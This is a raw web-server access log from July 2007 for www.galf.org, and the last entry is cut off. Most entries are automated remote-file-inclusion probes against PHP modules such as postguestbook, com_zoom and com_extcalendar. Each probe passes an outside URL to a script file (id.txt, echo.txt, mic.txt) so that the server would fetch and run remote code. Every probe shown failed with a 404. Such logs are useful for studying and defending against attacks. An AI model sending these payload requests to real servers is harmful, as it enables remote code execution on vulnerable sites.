75.126.219.187 - - [16/Jul/2007:02:13:15 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.138.18 - - [16/Jul/2007:02:13:39 -0700] "GET /logs/index2.php?url_page=http://www.ricksa.xpgplus.com.br/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
75.126.219.187 - - [16/Jul/2007:02:13:42 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
75.126.219.187 - - [16/Jul/2007:02:13:42 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
75.126.219.187 - - [16/Jul/2007:02:13:42 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.138.18 - - [16/Jul/2007:02:13:44 -0700] "GET /index2.php?url_page=http://www.ricksa.xpgplus.com.br/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.87.13 - - [16/Jul/2007:02:15:01 -0700] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
75.126.219.187 - - [16/Jul/2007:02:15:36 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
75.126.219.187 - - [16/Jul/2007:02:15:36 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
75.126.219.187 - - [16/Jul/2007:02:15:36 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
75.126.219.187 - - [16/Jul/2007:02:16:41 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
75.126.219.187 - - [16/Jul/2007:02:16:41 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
75.126.219.187 - - [16/Jul/2007:02:16:41 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.168.250.60 - - [16/Jul/2007:02:19:01 -0700] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.rhino-invest.info/FIP/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
70.87.59.50 - - [16/Jul/2007:02:23:18 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.59.50 - - [16/Jul/2007:02:23:19 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.208.91.108 - - [16/Jul/2007:02:26:32 -0700] "GET /logs/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.208.91.108 - - [16/Jul/2007:02:26:33 -0700] "GET /components/com_extcalendar/extcalendar.php?